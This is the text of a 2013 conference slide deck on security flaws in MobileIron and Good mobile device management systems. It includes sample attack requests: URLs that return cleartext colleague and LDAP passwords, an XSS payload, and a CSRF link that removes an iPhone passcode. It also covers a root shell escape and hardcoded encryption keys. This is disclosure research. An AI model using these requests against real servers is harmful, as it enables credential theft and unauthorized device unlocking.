the security of mdm systems - hack in paris · the security of mdm systems hack in paris 2013 ......

The Security of MDM systemsHack In Paris 2013Sebastien Andrivet

Copyright © 2013 ADVTOOLS SARL

Who am I?

Sebastien Andrivet

Switzerland (Geneva)

Specialized in security

Mobiles (iOS, Android)

Forensic

Developer C++, x86 and ARM

(Cyberfeminist & Hacktivist)

2


Agenda

Smart devices, BYOD, COPE, ...

MDM typical features

MDM market

MDM & security - on paper

MDM & security - findings

3


Smart devices

4


MDM, MAM, ...

MDM

Mobile Device Management

MAM

Mobile Application Management

MCM

Mobile Content Management

Etc.

6


MDM - Typical featuresDevice inventory tracking

Software inventory tracking

Telephone expense management

Device tracking

Backup & restore

Remote lock, wipe, etc

App deployment

Etc.7


BYOD - COPEBYOD: “Bring Your Own Device”

COPE: “Corporate Owned, Personally Enabled”

Differences

Costs

Ownership

Management8


NOC, not NOC

Some products use a central relay

Network Operations Center - NOC

Blackberry

Good Technologies

Some others are not

MobileIron

9


Deployment

On premise (virtual server)

Appliance

Cloud-based

10


MDM Market

11

Source: Gartner (May 2013)


MobileIronManagement of devices

iOS, Android, BlackBerry, Windows Phone, ...

Enterprise App Store

Integration into Enterprise with API

Exchange/Notes Proxy (Sentry)

No NOC, on-premise or cloud

Uses native apps (thin agent)12


GoodManagement of devices

iOS, Android, Windows Phone, ...

Not BlackBerry

Enterprise App Store

Access to Exchange/Notes through Good Server

NOC

Uses its own apps (thick agent)

e-mails, calendar, contact13


Security on Paper

14


CVE, exploit-db, ...CVE Details

Nothing

Exploit-DB

Only 1 entry for MobileIron (June 10, 2013)

Open Security Research

About Good hacking (read mails)

A paper from iSEC Partners

Some references about SCEP

xCon15


Switzerland

16


My Target

Is it possible for an operator (MDM admin) to:

Read / steal emails

Without authorization

If yes, is it traceable?

17


In other terms

Is it possible for an IT employee to steal information from its employer

like e-mails of the management, about clients, ...

and sell them to Germany, France, United States, ...

18


My Tests

These products are big

It takes time to test then entirely

So I focus only one some aspects

Installation / Deployment

Enrollment of devices

Management interface

19


Timeframe

First series of tests in Oct.-December 2012

Second series in June 2013

MDM

MobileIron

Good

Both with Exchange

On premise (virtual machines)

20


Good - Network

21

MDM server Firewall

Good NOC

No DMZ

your network

self-service


MobileIron - Network

22

MDM server Firewall


MobileIron - Network

23

tcp/443 (https)tcp/8080tcp/9997tcp/9998

tcp/398-636tcp/443 (https)

Internal LAN DMZ Internet

Firewall Firewall

MDM

ExchangeADetc.


Operating Systems

MobileIron

CentOS

Good

Windows Server 2008

24


Processes

Good runs as Administrator of the server

No least privilege

Not possible to change it

MobileIron

users tomcat, apache, mysql, ...

25


Exchange

MobileIron

Exchange proxy (ActiveSync) “Sentry”

Good

You have to give to Good MDM almost all rights to Exchange mailboxes

26


Good & Mails

You are not reading e-mails

Good Server did

All you need to read e-mails of someone

is to enroll a new device (OTA)

No need of user’s password

An MDM admin can do that

See Open Security Research (April 2012)

27


Admin Interface

MobileIron

Important

this was the state last year (Dec. 2012)

28


Admin Interface

29

<Removed in this public version>


Retrieve Passwords in Clear“Magic” request

https://server.lab/misc/misc.html?action=getLocalUserList&limit=20

Gives the password in clear of... your colleagues!

Mitigation: You have to be authenticated

30

My password Password of my colleague






Another magic request

https://server.lab/mifs/admin/ud.html?action=getLDAPConfigs

Gives the password in clear of the LDAP (AD) account!

Mitigation: You have to be authenticated31






Cross-Site ScriptingIn various places

32

<img src=1.gif onerror=alert(‘XSS_in_Name’)>


Cross-Site Scripting

33

<Removed in this public version>


Cross-Site ScriptingGood

They take anti-XSS measures everywhere except in one place

34


Mitigation

Good & MobileIron session cookies

Secure

HttpOnly

So not so easy to steal (by XSS, ...)

MobileIron

X-Frame-Options: SameOrigin

35


Cross-Site Request Forgery

MobileIron

Everywhere, no anti-CSRF measures

POST can be replaced by GET

So very easy to use an image, ... to trigger

Good

Everywhere, no anti-CSRF measures

But POSTs36


Example - PoC #1

Remove iPhone passcode

When an iOS device is enrolled (configuration profile), a MDM can remove the passcode over-the-air

only MDM can do that (validated by certificates)

Using CSRF vulnerabilities of MobileIron, I have developed an PoC to remove the passcode of a given iPhone

37


Example - PoC #1The PoC sends the following (using an <IMG> tag)

https://server/mifs/admin/ud.html?action=unlockpassword&phone=[{%22deviceId%22%3A%23fb2acc3e-47c7-502a-8a80-8fd7dfd97a86%22}]

“23fb...86” is the UUID of the phone to unlock

Of course, some social engineering (or XSS) is necessary

38

http://livepage.apple.com/











Example - PoC #2

Good

By combining data leakage + XSS + CSRF, we were able to give admin rights to any user

39


Example - PoC #2Contrary to MobileIron, CSRF with GET is not possible

Use POST instead

40


Command Line MobileIron has also a command line interface

A little like a router

“enable” command for privileged actions

May also be accessible from SSH or Telnet

Depending of configuration

41


Remote Command Execution

Not found by myself, but by “prdelka”

Exploit-DB, June 10, 2013

Command “show log” uses “less” underneath and sudo

Execute a shell command inside “less” with “!” or “|”

Executed as root

This is patched now

42


Today

These problems (XSS, CSRF, retrieve passwords in clear, ...) have been fixed in latest versions of MobileIron

Filtering and replacement to avoid XSS

Not sure (hum...) it is correctly done but no time to investigate further

Anti-CSRF tokens (per session)

But some other problems remain...

43


Weak Encryption

Both products are using AES, SHA, etc.

They are FIPS-blah blah certified

But what about keys...

44


MobileIron Local UsersWith MobileIron, administrators are local users

Not possible to use LDAP (AD) users

Stored in an XML file identityconfig.xml

Password encrypted

45


MobileIron Local Users

base-64 encoding

AES encryption, with ECB

PKCS#5 padding

key...

This passphrase is derived with SHA-1, one time

46

<actual passphrase not disclosed in this public version>


PoC #3

Fix, identical key for all installations

No salt, no iterations (1), no PBKDF2, ...

We have made a small java application to “recover” passwords from a given installation

The same encryption is used for various information

47


User AccountsMobileIron stores accounts (smart devices users) in a MySQL database

table mi_users

Same hash, but not same encrypted password (sometimes). Are they using salt?

48


KeysNo. It uses... 5 keys

These keys are initialized at startup with fixed, hardcoded values

To encrypt a password, one of those keys is chosen randomly

To verify a password, each key is tried one by one...

Same mechanism is used for other passwords

49


PoC #4

We have made a small Java application to “recover” passwords from

a mysql database

a MobileIron backup

50


But wait a minute...!Why MobileIron is storing those password?

In particular for LDAP (external users)?

Where are these passwords coming from?

From self-service portal?

From Sentry server (ActiveSync)?

From NSA?

From space?51


They come from...From the smart device app

during enrollment

Password is transmitted and stored

“Save User Password Preferences”

Related to Exchange profiles

MobileIron recommends to check Yes

DO NOT DO THAT!52


Agents on devices

“Practical Attacks against Mobile Device Management (MDM)”

BlackHat 2013, Lacoon Mobile Security

How to break Good (and others) secure containers

But I personally don’t agree with them regarding iOS

53


Agents on devices

“Auditing Enterprise Class Applications and Secure Containers on Android”

iSEC Partners, Dec. 2012

Only Android

Good & MobileIron

Breaking encryption keys, defeating rooting detection, ...

54


More...

There are several more points

MobileIron & iOS keychain

Good AES keys generation

Jailbreak detection

Etc.

But time is limited

Perhaps for another talk...

55


Conclusion

Actual security of MDM solution very dependent of their configuration

For ex. “Save user password”

Very dependent of the deployment context

Case by case

Like any somehow complex system

56


ConclusionSecurity was not the priority of MDM sys

At least during development

Situation is improving

But still vulnerable points like encryption

Difficult to say that one product is safer than another

Good is better programmed

But Good NOC is a problem57


Thank you!

Follow me on Twitter

@AndrivetSeb

Web site

www.advtools.com

My e-mail

[email protected]

58

http://www.advtools.com

http://www.advtools.com

mailto:[email protected]

mailto:[email protected]

the security of mdm systems - hack in paris · the security of mdm systems hack in paris 2013 ......

Documents